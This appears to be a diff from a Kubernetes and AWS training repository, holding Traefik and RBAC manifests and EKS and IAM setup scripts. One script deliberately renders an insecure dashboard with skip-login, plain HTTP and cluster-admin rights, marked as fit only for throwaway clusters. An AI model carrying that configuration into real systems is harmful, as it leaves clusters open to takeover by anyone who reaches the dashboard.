terminationGracePeriodSeconds: 60
containers:
- image: traefik:1.7
name: traefik-ingress-lb
ports:
- name: http
containerPort: 80
hostPort: 80
- name: admin
containerPort: 8080
hostPort: 8080
securityContext:
capabilities:
drop:
- ALL
add:
- NET_BIND_SERVICE
args:
- --api
- --kubernetes
- --logLevel=INFO
---
kind: ClusterRole
apiVersion: rbac.authorization.k8s.io/v1
metadata:
name: traefik-ingress-controller
rules:
- apiGroups:
- ""
resources:
- services
- endpoints
- secrets
verbs:
- get
- list
- watch
- apiGroups:
- extensions
resources:
- ingresses
verbs:
- get
- list
- watch
---
kind: ClusterRoleBinding
apiVersion: rbac.authorization.k8s.io/v1
metadata:
name: traefik-ingress-controller
roleRef:
apiGroup: rbac.authorization.k8s.io
kind: ClusterRole
name: traefik-ingress-controller
subjects:
- kind: ServiceAccount
name: traefik-ingress-controller
namespace: kube-system

View File

@@ -1,114 +0,0 @@
---
apiVersion: v1
kind: ServiceAccount
metadata:
name: traefik-ingress-controller
namespace: kube-system
---
kind: DaemonSet
apiVersion: apps/v1
metadata:
name: traefik-ingress-controller
namespace: kube-system
labels:
k8s-app: traefik-ingress-lb
spec:
selector:
matchLabels:
k8s-app: traefik-ingress-lb
template:
metadata:
labels:
k8s-app: traefik-ingress-lb
name: traefik-ingress-lb
spec:
tolerations:
- effect: NoSchedule
operator: Exists
hostNetwork: true
serviceAccountName: traefik-ingress-controller
terminationGracePeriodSeconds: 60
containers:
- image: traefik:v2.5
name: traefik-ingress-lb
ports:
- name: http
containerPort: 80
hostPort: 80
- name: https
containerPort: 443
hostPort: 443
- name: admin
containerPort: 8080
hostPort: 8080
securityContext:
capabilities:
drop:
- ALL
add:
- NET_BIND_SERVICE
args:
- --accesslog
- --api
- --api.insecure
- --log.level=INFO
- --metrics.prometheus
- --providers.kubernetesingress
- --entrypoints.http.Address=:80
- --entrypoints.https.Address=:443
- --entrypoints.https.http.tls.certResolver=default
---
kind: ClusterRole
apiVersion: rbac.authorization.k8s.io/v1
metadata:
name: traefik-ingress-controller
rules:
- apiGroups:
- ""
resources:
- services
- endpoints
- secrets
verbs:
- get
- list
- watch
- apiGroups:
- extensions
resources:
- ingresses
verbs:
- get
- list
- watch
- apiGroups:
- networking.k8s.io
resources:
- ingresses
- ingressclasses
verbs:
- get
- list
- watch
---
kind: ClusterRoleBinding
apiVersion: rbac.authorization.k8s.io/v1
metadata:
name: traefik-ingress-controller
roleRef:
apiGroup: rbac.authorization.k8s.io
kind: ClusterRole
name: traefik-ingress-controller
subjects:
- kind: ServiceAccount
name: traefik-ingress-controller
namespace: kube-system
---
kind: IngressClass
apiVersion: networking.k8s.io/v1
metadata:
name: traefik
annotations:
ingressclass.kubernetes.io/is-default-class: "true"
spec:
controller: traefik.io/ingress-controller
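
Thanks to the `is-default-class` annotation, plain Ingress resources are picked up by Traefik without any class annotation. A quick check (the `web` Service and host name below are examples):

```bash
kubectl get ingressclass    # "traefik" should be flagged as the default
kubectl create ingress web --rule="web.example.com/*=web:80"
```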

View File

@@ -1 +0,0 @@
traefik-v2.yaml

100
k8s/traefik.yaml Normal file
View File

@@ -0,0 +1,100 @@
---
apiVersion: v1
kind: ServiceAccount
metadata:
name: traefik-ingress-controller
namespace: kube-system
---
kind: DaemonSet
apiVersion: extensions/v1beta1
metadata:
name: traefik-ingress-controller
namespace: kube-system
labels:
k8s-app: traefik-ingress-lb
spec:
template:
metadata:
labels:
k8s-app: traefik-ingress-lb
name: traefik-ingress-lb
spec:
tolerations:
- effect: NoSchedule
operator: Exists
hostNetwork: true
serviceAccountName: traefik-ingress-controller
terminationGracePeriodSeconds: 60
containers:
- image: traefik
name: traefik-ingress-lb
ports:
- name: http
containerPort: 80
hostPort: 80
- name: admin
containerPort: 8080
hostPort: 8080
securityContext:
capabilities:
drop:
- ALL
add:
- NET_BIND_SERVICE
args:
- --api
- --kubernetes
- --logLevel=INFO
---
kind: Service
apiVersion: v1
metadata:
name: traefik-ingress-service
namespace: kube-system
spec:
selector:
k8s-app: traefik-ingress-lb
ports:
- protocol: TCP
port: 80
name: web
- protocol: TCP
port: 8080
name: admin
---
kind: ClusterRole
apiVersion: rbac.authorization.k8s.io/v1beta1
metadata:
name: traefik-ingress-controller
rules:
- apiGroups:
- ""
resources:
- services
- endpoints
- secrets
verbs:
- get
- list
- watch
- apiGroups:
- extensions
resources:
- ingresses
verbs:
- get
- list
- watch
---
kind: ClusterRoleBinding
apiVersion: rbac.authorization.k8s.io/v1beta1
metadata:
name: traefik-ingress-controller
roleRef:
apiGroup: rbac.authorization.k8s.io
kind: ClusterRole
name: traefik-ingress-controller
subjects:
- kind: ServiceAccount
name: traefik-ingress-controller
namespace: kube-system

View File

@@ -1,62 +0,0 @@
#!/bin/sh
banner() {
echo "# This file was generated with the script $0."
echo "#"
}
namespace() {
# 'helm template --namespace ... --create-namespace'
# doesn't create the namespace, so we need to create it.
echo ---
kubectl create namespace kubernetes-dashboard \
-o yaml --dry-run=client
echo ---
}
(
banner
namespace
helm template kubernetes-dashboard kubernetes-dashboard \
--repo https://kubernetes.github.io/dashboard/ \
--create-namespace --namespace kubernetes-dashboard \
--set "extraArgs={--enable-skip-login,--enable-insecure-login}" \
--set protocolHttp=true \
--set service.type=NodePort \
#
echo ---
kubectl create clusterrolebinding kubernetes-dashboard:insecure \
--clusterrole=cluster-admin \
--serviceaccount=kubernetes-dashboard:kubernetes-dashboard \
-o yaml --dry-run=client \
#
) > dashboard-insecure.yaml
(
banner
namespace
helm template kubernetes-dashboard kubernetes-dashboard \
--repo https://kubernetes.github.io/dashboard/ \
--create-namespace --namespace kubernetes-dashboard \
#
) > dashboard-recommended.yaml
(
banner
namespace
helm template kubernetes-dashboard kubernetes-dashboard \
--repo https://kubernetes.github.io/dashboard/ \
--create-namespace --namespace kubernetes-dashboard \
--set service.type=NodePort \
#
echo ---
kubectl create clusterrolebinding kubernetes-dashboard:cluster-admin \
--clusterrole=cluster-admin \
--serviceaccount=kubernetes-dashboard:cluster-admin \
-o yaml --dry-run=client \
#
echo ---
kubectl create serviceaccount -n kubernetes-dashboard cluster-admin \
-o yaml --dry-run=client \
#
) > dashboard-with-token.yaml
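
Typical usage of this generator (the script name below is an assumption; use whatever name the file was saved under). The "insecure" variant is only sensible on throwaway training clusters:

```bash
sh generate-dashboard-manifests.sh
kubectl apply -f dashboard-insecure.yaml
# The chart is rendered with service.type=NodePort, so:
kubectl -n kubernetes-dashboard get service kubernetes-dashboard
```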

View File

@@ -1,33 +0,0 @@
---
apiVersion: v1
kind: ServiceAccount
metadata:
name: jean.doe
namespace: users
---
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRole
metadata:
name: user=jean.doe
rules:
- apiGroups: [ certificates.k8s.io ]
resources: [ certificatesigningrequests ]
verbs: [ create ]
- apiGroups: [ certificates.k8s.io ]
resourceNames: [ user=jean.doe ]
resources: [ certificatesigningrequests ]
verbs: [ get, create, delete, watch ]
---
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRoleBinding
metadata:
name: user=jean.doe
roleRef:
apiGroup: rbac.authorization.k8s.io
kind: ClusterRole
name: user=jean.doe
subjects:
- kind: ServiceAccount
name: jean.doe
namespace: users
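
The ClusterRole lets this ServiceAccount create CSRs, but get, delete, or watch only the one named `user=jean.doe`. Impersonation is a quick way to verify that (a sketch):

```bash
kubectl auth can-i create certificatesigningrequests \
  --as=system:serviceaccount:users:jean.doe    # expect "yes"
kubectl auth can-i delete certificatesigningrequests/user=jean.doe \
  --as=system:serviceaccount:users:jean.doe    # expect "yes"
kubectl auth can-i delete certificatesigningrequests/someone-else \
  --as=system:serviceaccount:users:jean.doe    # expect "no"
```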

View File

@@ -1,64 +0,0 @@
---
apiVersion: v1
kind: PersistentVolume
metadata:
name: consul-node2
spec:
capacity:
storage: 10Gi
accessModes:
- ReadWriteOnce
persistentVolumeReclaimPolicy: Delete
local:
path: /mnt/consul
nodeAffinity:
required:
nodeSelectorTerms:
- matchExpressions:
- key: kubernetes.io/hostname
operator: In
values:
- node2
---
apiVersion: v1
kind: PersistentVolume
metadata:
name: consul-node3
spec:
capacity:
storage: 10Gi
accessModes:
- ReadWriteOnce
persistentVolumeReclaimPolicy: Delete
local:
path: /mnt/consul
nodeAffinity:
required:
nodeSelectorTerms:
- matchExpressions:
- key: kubernetes.io/hostname
operator: In
values:
- node3
---
apiVersion: v1
kind: PersistentVolume
metadata:
name: consul-node4
spec:
capacity:
storage: 10Gi
accessModes:
- ReadWriteOnce
persistentVolumeReclaimPolicy: Delete
local:
path: /mnt/consul
nodeAffinity:
required:
nodeSelectorTerms:
- matchExpressions:
- key: kubernetes.io/hostname
operator: In
values:
- node4

View File

@@ -1,13 +0,0 @@
#!/bin/sh
# Create an EKS cluster.
# This is not idempotent (each time you run it, it creates a new cluster).
eksctl create cluster \
--node-type=t3.large \
--nodes-max=10 \
--alb-ingress-access \
--asg-access \
--ssh-access \
--with-oidc \
#

View File

@@ -1,32 +0,0 @@
#!/bin/sh
# For each user listed in "users.txt", create an IAM user.
# Also create AWS API access keys, and store them in "users.keys".
# This is idempotent (you can run it multiple times, it will only
# create the missing users). However, it will not remove users.
# Note that you can remove users from "users.keys" (or even wipe
# that file out entirely) and then this script will delete their
# keys and generate new keys for them (and add the new keys to
# "users.keys".)
echo "Getting list of existing users ..."
aws iam list-users --output json | jq -r .Users[].UserName > users.tmp
for U in $(cat users.txt); do
if ! grep -qw $U users.tmp; then
echo "Creating user $U..."
aws iam create-user --user-name=$U \
--tags=Key=container.training,Value=1
fi
if ! grep -qw $U users.keys; then
echo "Listing keys for user $U..."
KEYS=$(aws iam list-access-keys --user-name=$U --output json | jq -r .AccessKeyMetadata[].AccessKeyId)
for KEY in $KEYS; do
echo "Deleting key $KEY for user $U..."
aws iam delete-access-key --user-name=$U --access-key-id=$KEY
done
echo "Creating access key for user $U..."
aws iam create-access-key --user-name=$U --output json \
| jq -r '.AccessKey | [ .UserName, .AccessKeyId, .SecretAccessKey ] | @tsv' \
>> users.keys
fi
done
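
A usage sketch (the script name is an assumption): `users.txt` holds one IAM user name per line, and `users.keys` accumulates tab-separated (user name, access key ID, secret key) triplets:

```bash
sh create-iam-users.sh
# Pretty-print the generated credentials:
column -t users.keys
```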

View File

@@ -1,51 +0,0 @@
#!/bin/sh
# Create an IAM policy to authorize users to do "aws eks update-kubeconfig".
# This is idempotent, which allows you to update the policy document below
# if you want the users to do other things as well.
# Note that each time you run this script, it will actually create a new
# version of the policy, set that version as the default version, and
# remove all non-default versions. (You can only have up to 5 versions
# of a given policy, so old versions need to be cleaned up.)
# After running this script, you will want to attach the policy to the
# users (check the other scripts in this directory).
POLICY_NAME=user.container.training
POLICY_DOC='{
"Version": "2012-10-17",
"Statement": [
{
"Action": [
"eks:DescribeCluster"
],
"Resource": "arn:aws:eks:*",
"Effect": "Allow"
}
]
}'
ACCOUNT=$(aws sts get-caller-identity | jq -r .Account)
aws iam create-policy-version \
--policy-arn arn:aws:iam::$ACCOUNT:policy/$POLICY_NAME \
--policy-document "$POLICY_DOC" \
--set-as-default
# For reference, the command below creates a policy without versioning:
#aws iam create-policy \
#--policy-name user.container.training \
#--policy-document "$JSON"
for VERSION in $(
aws iam list-policy-versions \
--policy-arn arn:aws:iam::$ACCOUNT:policy/$POLICY_NAME \
--query 'Versions[?!IsDefaultVersion].VersionId' \
--output text)
do
aws iam delete-policy-version \
--policy-arn arn:aws:iam::$ACCOUNT:policy/$POLICY_NAME \
--version-id "$VERSION"
done
# For reference, the command below shows all users using the policy:
#aws iam list-entities-for-policy \
#--policy-arn arn:aws:iam::$ACCOUNT:policy/$POLICY_NAME
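
After a run, only the freshly created default version should remain. A hedged way to confirm:

```bash
ACCOUNT=$(aws sts get-caller-identity | jq -r .Account)
aws iam list-policy-versions \
  --policy-arn arn:aws:iam::$ACCOUNT:policy/user.container.training
```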

View File

@@ -1,14 +0,0 @@
#!/bin/sh
# Attach our user policy to all the users defined in "users.txt".
# This should be idempotent, because attaching the same policy
# to the same user multiple times doesn't do anything.
ACCOUNT=$(aws sts get-caller-identity | jq -r .Account)
POLICY_NAME=user.container.training
for U in $(cat users.txt); do
echo "Attaching policy to user $U ..."
aws iam attach-user-policy \
--user-name $U \
--policy-arn arn:aws:iam::$ACCOUNT:policy/$POLICY_NAME
done

View File

@@ -1,24 +0,0 @@
#!/bin/sh
# Update the aws-auth ConfigMap to map our IAM users to Kubernetes users.
# Each user defined in "users.txt" will be mapped to a Kubernetes user
# with the same name, and put in the "container.training" group, too.
# This is idempotent.
# WARNING: this will wipe out the mapUsers component of the aws-auth
# ConfigMap, removing all users that aren't in "users.txt".
# It won't touch mapRoles, so it shouldn't break the role mappings
# put in place by EKS.
ACCOUNT=$(aws sts get-caller-identity | jq -r .Account)
rm -f users.map
for U in $(cat users.txt); do
echo "\
- userarn: arn:aws:iam::$ACCOUNT:user/$U
username: $U
groups: [ container.training ]\
" >> users.map
done
kubectl create --namespace=kube-system configmap aws-auth \
--dry-run=client --from-file=mapUsers=users.map -o yaml \
| kubectl apply -f-
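
To confirm the resulting mapping (and that `mapRoles` was indeed left alone):

```bash
kubectl --namespace=kube-system get configmap aws-auth -o yaml
```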

View File

@@ -1,65 +0,0 @@
#!/bin/sh
# Create a shared Kubernetes Namespace ("container-training") as well as
# individual namespaces for every user in "users.txt", and set up a bunch
# of permissions.
# Specifically:
# - each user gets "view" permissions in the "default" Namespace
# - each user gets "edit" permissions in the "container-training" Namespace
# - each user gets permissions to list Nodes and Namespaces
# - each user gets "admin" permissions in their personal Namespace
# Note that since Kubernetes Namespaces can't have dots in their names,
# if a user has dots, dots will be mapped to dashes.
# So user "ada.lovelace" will get namespace "ada-lovelace".
# This is kind of idempotent (but will raise a bunch of errors for objects
# that already exist).
# TODO: if this needs to evolve, replace all the "create" operations by
# "apply" operations. But this is good enough for now.
kubectl create rolebinding --namespace default container.training \
--group=container.training --clusterrole=view
kubectl create clusterrole view-nodes \
--verb=get,list,watch --resource=node
kubectl create clusterrolebinding view-nodes \
--group=container.training --clusterrole=view-nodes
kubectl create clusterrole view-namespaces \
--verb=get,list,watch --resource=namespace
kubectl create clusterrolebinding view-namespaces \
--group=container.training --clusterrole=view-namespaces
kubectl create namespace container-training
kubectl create rolebinding --namespace container-training edit \
--group=container.training --clusterrole=edit
# Note: API calls to EKS tend to be fairly slow. To optimize things a bit,
# instead of running "kubectl" N times, we generate a bunch of YAML and
# apply it. It will still generate a lot of API calls but it's much faster
# than calling "kubectl" N times. It might be possible to make this even
# faster by generating a "kind: List" (I don't know if this would issue
# a single API call or multiple ones; TBD!)
for U in $(cat users.txt); do
NS=$(echo $U | tr . -)
cat <<EOF
---
kind: Namespace
apiVersion: v1
metadata:
name: $NS
---
kind: RoleBinding
apiVersion: rbac.authorization.k8s.io/v1
metadata:
name: admin
namespace: $NS
roleRef:
apiGroup: rbac.authorization.k8s.io
kind: ClusterRole
name: admin
subjects:
- apiGroup: rbac.authorization.k8s.io
kind: User
name: $U
EOF
done | kubectl create -f-
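
The grants can be spot-checked with impersonation; `ada.lovelace` below is just an example entry from `users.txt`:

```bash
kubectl auth can-i list pods --namespace=default \
  --as=ada.lovelace --as-group=container.training    # view: "yes"
kubectl auth can-i create deployments --namespace=ada-lovelace \
  --as=ada.lovelace --as-group=container.training    # admin: "yes"
kubectl auth can-i create deployments --namespace=default \
  --as=ada.lovelace --as-group=container.training    # view only: "no"
```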

View File

@@ -1,76 +0,0 @@
#!/bin/sh
# Create an IAM role to be used by a Kubernetes ServiceAccount.
# The role isn't given any permissions yet (this has to be done by
# another script in this series), but a properly configured Pod
# should still be able to execute "aws sts get-caller-identity"
# and confirm that it's using that role.
# This requires the cluster to have an attached OIDC provider.
# This should be the case if the cluster has been created with
# the scripts in this directory; otherwise, this can be done with
# the following command, which is idempotent:
# eksctl utils associate-iam-oidc-provider --cluster cluster-name-12341234 --approve
# The policy document used below will authorize all ServiceAccounts
# in the "container-training" Namespace to use that role.
# This script will also annotate the container-training:default
# ServiceAccount so that it can use that role.
# This script is not quite idempotent: if you want to use a new
# trust policy, some work will be required. (You can delete the role,
# but that requires detaching the associated policies. There might also
# be a way to update the trust policy directly; we didn't investigate this
# further at this point.)
if [ "$1" ]; then
CLUSTER="$1"
else
echo "Please indicate cluster to use. Available clusters:"
aws eks list-clusters --output table
exit 1
fi
ACCOUNT=$(aws sts get-caller-identity | jq -r .Account)
OIDC=$(aws eks describe-cluster --name $CLUSTER --query cluster.identity.oidc.issuer --output text | cut -d/ -f3-)
ROLE_NAME=s3-reader-container-training
TRUST_POLICY=$(envsubst <<EOF
{
"Version": "2012-10-17",
"Statement": [
{
"Effect": "Allow",
"Principal": {
"Federated": "arn:aws:iam::${ACCOUNT}:oidc-provider/${OIDC}"
},
"Action": "sts:AssumeRoleWithWebIdentity",
"Condition": {
"StringLike": {
"${OIDC}:sub": ["system:serviceaccount:container-training:*"]
}
}
}
]
}
EOF
)
aws iam create-role \
--role-name "$ROLE_NAME" \
--assume-role-policy-document "$TRUST_POLICY"
kubectl annotate serviceaccounts \
--namespace container-training default \
"eks.amazonaws.com/role-arn=arn:aws:iam::$ACCOUNT:role/$ROLE_NAME" \
--overwrite
exit
# Here are commands to delete the role:
for POLICY_ARN in $(aws iam list-attached-role-policies --role-name $ROLE_NAME --query 'AttachedPolicies[*].PolicyArn' --output text); do aws iam detach-role-policy --role-name $ROLE_NAME --policy-arn $POLICY_ARN; done
aws iam delete-role --role-name $ROLE_NAME
# Merging the policy with the existing policies:
{
aws iam get-role --role-name s3-reader-container-training | jq -r .Role.AssumeRolePolicyDocument.Statement[]
echo "$TRUST_POLICY" | jq -r .Statement[]
} | jq -s '{"Version": "2012-10-17", "Statement": .}' > /tmp/policy.json
aws iam update-assume-role-policy \
--role-name $ROLE_NAME \
--policy-document file:///tmp/policy.json
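
To confirm that the annotation is honored (on EKS, the pod identity webhook injects the credentials), a throwaway pod using the annotated `default` ServiceAccount should report the role rather than the node identity. A sketch; the pod name and image are just examples:

```bash
kubectl run awscli --rm -it --restart=Never \
  --namespace=container-training \
  --image=amazon/aws-cli -- sts get-caller-identity
# Expect an ARN like arn:aws:sts::<account>:assumed-role/s3-reader-container-training/...
```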

View File

@@ -1,54 +0,0 @@
#!/bin/sh
# Create an S3 bucket with two objects in it:
# - public.txt (world-readable)
# - private.txt (private)
# Also create an IAM policy granting read-only access to the bucket
# (and therefore, to the private object).
# Finally, attach the policy to an IAM role (for instance, the role
# created by another script in this directory).
# This isn't idempotent, but it can be made idempotent by replacing the
# "aws iam create-policy" call with "aws iam create-policy-version" and
# a bit of extra elbow grease. (See other scripts in this directory for
# an example).
ACCOUNT=$(aws sts get-caller-identity | jq -r .Account)
BUCKET=container.training
ROLE_NAME=s3-reader-container-training
POLICY_NAME=s3-reader-container-training
POLICY_DOC=$(envsubst <<EOF
{
"Version": "2012-10-17",
"Statement": [
{
"Effect": "Allow",
"Action": [
"s3:ListBucket",
"s3:GetObject*"
],
"Resource": [
"arn:aws:s3:::$BUCKET",
"arn:aws:s3:::$BUCKET/*"
]
}
]
}
EOF
)
aws iam create-policy \
--policy-name $POLICY_NAME \
--policy-document "$POLICY_DOC"
aws s3 mb s3://container.training
echo "this is a public object" \
| aws s3 cp - s3://container.training/public.txt \
--acl public-read
echo "this is a private object" \
| aws s3 cp - s3://container.training/private.txt \
--acl private
aws iam attach-role-policy \
--role-name "$ROLE_NAME" \
--policy-arn arn:aws:iam::$ACCOUNT:policy/$POLICY_NAME
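
A hedged way to verify the two ACLs: the public object is readable anonymously, while the private one needs credentials carrying the policy above (the path-style URL assumes the bucket lives in us-east-1):

```bash
curl https://s3.amazonaws.com/container.training/public.txt
# From an identity that has, or can assume, the reader role:
aws s3 cp s3://container.training/private.txt -
```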

View File

@@ -1,50 +0,0 @@
ada.lovelace
adele.goldstine
amanda.jones
anita.borg
ann.kiessling
barbara.mcclintock
beatrice.worsley
bessie.blount
betty.holberton
beulah.henry
carleen.hutchins
caroline.herschel
dona.bailey
dorothy.hodgkin
ellen.ochoa
edith.clarke
elisha.collier
elizabeth.feinler
emily.davenport
erna.hoover
frances.spence
gertrude.blanch
grace.hopper
grete.hermann
giuliana.tesoro
harriet.tubman
hedy.lamarr
irma.wyman
jane.goodall
jean.bartik
joy.mangano
josephine.cochrane
katherine.blodgett
kathleen.antonelli
lynn.conway
margaret.hamilton
maria.beasley
marie.curie
marjorie.joyner
marlyn.meltzer
mary.kies
melitta.bentz
milly.koss
radia.perlman
rosalind.franklin
ruth.teitelbaum
sarah.mather
sophie.wilson
stephanie.kwolek
yvonne.brill

View File

@@ -7,8 +7,8 @@ workshop.
## 1. Prerequisites
Virtualbox, Vagrant and Ansible
Virtualbox, Vagrant and Ansible
- Virtualbox: https://www.virtualbox.org/wiki/Downloads
@@ -25,20 +25,19 @@ Virtualbox, Vagrant and Ansible
$ git clone --recursive https://github.com/ansible/ansible.git
$ cd ansible
$ git checkout stable-{{ getStableVersionFromAnsibleProject }}
$ git checkout stable-2.0.0.1
$ git submodule update
- source the setup script to make Ansible available on this terminal session:
$ source path/to/your-ansible-clone/hacking/env-setup
- you need to repeat the last step every time you open a new terminal session
- you need to repeat the last step everytime you open a new terminal session
and want to use any Ansible command (but you'll probably only need to run
it once).
## 2. Preparing the environment
Change into the directory that has your Vagrantfile
Run the following commands:
@@ -67,14 +66,6 @@ will reflect inside the instance.
- Depending on the Vagrant version, `sudo apt-get install bsdtar` may be needed
- If you get an error like "no Vagrant file found" or you have a file but "cannot open base box" when running `vagrant up`,
chances are good you are not in the correct directory.
Make sure you are in the subdirectory named "prepare-local". It has all the config files required by Ansible, Vagrant, and VirtualBox.
- If you are using Python 3.7 and you see an error like "SyntaxError: invalid syntax" mentioning
the word "async" when running the ansible-playbook provisioning, you need to upgrade your Ansible version to 2.6 or higher to resolve the keyword conflict.
https://github.com/ansible/ansible/issues/42105
- If you get strange Ansible errors about dependencies, try to check your pip
version with `pip --version`. The current version is 8.1.1. If your pip is
older than this, upgrade it with `sudo pip install --upgrade pip`, restart

View File

@@ -1,162 +0,0 @@
⚠️ This is a work in progress. The UX needs to be improved,
and the docs could be better.
This directory contains a Terraform configuration to deploy
a bunch of Kubernetes clusters on various cloud providers,
using their respective managed Kubernetes products.
## With shell wrapper
This is the recommended use. It makes it easy to start N clusters
on any provider. It will create a directory with a name like
`tag-YYYY-MM-DD-HH-MM-SS-SEED-PROVIDER`, copy the Terraform configuration
to that directory, then create the clusters using that configuration.
1. One-time setup: configure provider authentication for the provider(s) that you wish to use.
- Digital Ocean:
```bash
doctl auth init
```
- Google Cloud Platform: you will need to create a project named `prepare-tf`
and enable the relevant APIs for this project (sorry, if you're new to GCP,
this sounds vague; but if you're familiar with it you know what to do; if you
want to change the project name you can edit the Terraform configuration)
- Linode:
```bash
linode-cli configure
```
- Oracle Cloud: FIXME
(set up `oci` through the `oci-cli` Python package)
- Scaleway: run `scw init`
2. Optional: set number of clusters, cluster size, and region.
By default, 1 cluster will be configured, with 2 nodes, and auto-scaling up to 5 nodes.
If you want, you can override these parameters with the following variables.
```bash
export TF_VAR_how_many_clusters=5
export TF_VAR_min_nodes_per_pool=2
export TF_VAR_max_nodes_per_pool=4
export TF_VAR_location=xxx
```
The `location` variable is optional. Each provider should have a default value.
The value of the `location` variable is provider-specific. Examples:
| Provider | Example value | How to see possible values
|---------------|-------------------|---------------------------
| Digital Ocean | `ams3` | `doctl compute region list`
| Google Cloud | `europe-north1-a` | `gcloud compute zones list`
| Linode | `eu-central` | `linode-cli regions list`
| Oracle Cloud | `eu-stockholm-1` | `oci iam region list`
You can also specify multiple locations, and then they will be
used in round-robin fashion.
For example, with Google Cloud, since the default quotas are very
low (my account is limited to 8 public IP addresses per zone, and
my requests to increase that quota were denied) you can do the
following:
```bash
export TF_VAR_location=$(gcloud compute zones list --format=json | jq -r .[].name | grep ^europe)
```
Then when you apply, clusters will be created across all available
zones in Europe. (When I write this, there are 20+ zones in Europe,
so even with my quota, I can create 40 clusters.)
3. Run!
```bash
./run.sh <providername>
```
(If you don't specify a provider name, it will list available providers.)
4. Shutting down
Go to the directory that was created by the previous step (`tag-YYYY-MM...`)
and run `terraform destroy`.
You can also run `./clean.sh`, which will destroy ALL clusters deployed by previous runs of the `run.sh` script.
## Without shell wrapper
Expert mode.
Useful for running steps separately, and/or when working on the Terraform configurations.
1. Select the provider you wish to use.
Go to the `source` directory and edit `main.tf`.
Change the `source` attribute of the `module "clusters"` section.
Check the content of the `modules` directory to see available choices.
2. Initialize the provider.
```bash
terraform init
```
3. Configure provider authentication.
See steps above, and add the following extra steps:
- Digital Ocean:
```bash
export DIGITALOCEAN_ACCESS_TOKEN=$(grep ^access-token ~/.config/doctl/config.yaml | cut -d: -f2 | tr -d " ")
```
- Linode:
```bash
export LINODE_TOKEN=$(grep ^token ~/.config/linode-cli | cut -d= -f2 | tr -d " ")
```
4. Decide how many clusters and how many nodes per clusters you want.
5. Provision clusters.
```bash
terraform apply
```
6. Perform second stage provisioning.
This will install an SSH server on the clusters.
```bash
cd stage2
terraform init
terraform apply
```
7. Obtain cluster connection information.
The following command shows connection information, one cluster per line, ready to copy-paste in a shared document or spreadsheet.
```bash
terraform output -json | jq -r 'to_entries[].value.value'
```
8. Destroy clusters.
```bash
cd ..
terraform destroy
```
9. Clean up stage2.
```bash
rm stage2/terraform.tfstate*
```

View File

@@ -1,9 +0,0 @@
#!/bin/sh
export LINODE_TOKEN=$(grep ^token ~/.config/linode-cli | cut -d= -f2 | tr -d " ")
export DIGITALOCEAN_ACCESS_TOKEN=$(grep ^access-token ~/.config/doctl/config.yaml | cut -d: -f2 | tr -d " ")
for T in tag-*; do
(
cd $T
terraform apply -destroy -auto-approve && mv ../$T ../deleted$T
)
done

Some files were not shown because too many files have changed in this diff